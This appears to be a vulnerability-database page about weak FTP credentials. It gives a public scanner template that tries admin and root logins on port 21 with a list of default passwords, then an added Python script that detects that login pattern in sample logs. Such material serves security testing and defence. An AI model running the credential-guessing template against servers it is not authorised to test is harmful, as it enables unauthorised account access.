ftp-weak-credentials: FTP Service - Credential Weakness

Date: 2025-08-01 | Affected software: ftp | PoC: public

Vulnerability description

An FTP service was accessed with easily guessed credentials.

PoC code [public]

id: ftp-weak-credentials

info:
  name: FTP Service - Credential Weakness
  author: pussycat0x,h3h3qaq
  severity: high
  description: An FTP service was accessed with easily guessed credentials.
  reference:
    - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 8.5
  metadata:
    max-request: 1
  tags: network,ftp,default-login,service,tcp,vuln

tcp:

  - inputs:
      - data: "USER {{username}}\r\n"
        read: 8
      - data: "PASS {{password}}\r\n"
        read: 8

    host:
      - "{{Hostname}}"
    port: 21

    attack: clusterbomb
    payloads:
      username:
        - admin
        - root
      password:
        - password
        - toor
        - nas
        - guest
        - default
        - pass1
        - stingray

    matchers:
      - type: word
        words:
          - "230 Login successful"
# digest: 490a0046304402206ab021691dc0adc92f107b5890983306c086c7e9d815c691edd02dbd7b0166e7022014c61fcd139c62a17157ea63f4c68047ab52783f78d7fc668ddd71cf8771097f:922c64590222798bb761d5b6d8e72950
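
A defender-side check for the login pattern this template produces (repeated attempts on the admin and root accounts, ending in a successful login), added here as an example that is not part of the template or the original page. It assumes vsftpd-style log lines; the log format, the sample lines, the function name detect_weak_login and the failure threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Accounts the template tries (taken from its username payload list).
TARGET_USERS = {"admin", "root"}

# Assumed vsftpd log shape: <timestamp> [pid N] [user] OK|FAIL LOGIN: Client "ip"
LINE_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

# Constructed sample log, not taken from a real system.
SAMPLE_LOG = """\
Fri Aug  1 10:00:01 2025 [pid 4101] [admin] FAIL LOGIN: Client "192.0.2.10"
Fri Aug  1 10:00:02 2025 [pid 4102] [admin] FAIL LOGIN: Client "192.0.2.10"
Fri Aug  1 10:00:03 2025 [pid 4103] [admin] FAIL LOGIN: Client "192.0.2.10"
Fri Aug  1 10:00:04 2025 [pid 4104] [root] FAIL LOGIN: Client "192.0.2.10"
Fri Aug  1 10:00:05 2025 [pid 4105] [root] OK LOGIN: Client "192.0.2.10"
Fri Aug  1 10:05:00 2025 [pid 4200] [alice] OK LOGIN: Client "198.51.100.7"
Fri Aug  1 10:06:00 2025 [pid 4201] [admin] FAIL LOGIN: Client "198.51.100.7"
Fri Aug  1 10:06:30 2025 [pid 4202] [admin] OK LOGIN: Client "198.51.100.7"
""".splitlines()


def detect_weak_login(lines, min_failures=3):
    """Flag clients that failed at least min_failures logins on the target
    accounts and then logged in successfully on one of them."""
    failures = defaultdict(int)   # client IP -> failures since last success
    findings = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m["user"] not in TARGET_USERS:
            continue              # unrelated line or an account we do not track
        ip = m["ip"]
        if m["result"] == "FAIL":
            failures[ip] += 1
            continue
        # Successful login: suspicious only when it follows a run of failures.
        if failures[ip] >= min_failures:
            findings.append(
                {"ip": ip, "user": m["user"], "failed_before": failures[ip]}
            )
        failures[ip] = 0          # a success ends the current run either way
    return findings


if __name__ == "__main__":
    for finding in detect_weak_login(SAMPLE_LOG):
        print(finding)
```

A finding means the account accepted a password after a short run of failed attempts, so that account's password should be rotated and its FTP access reviewed.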
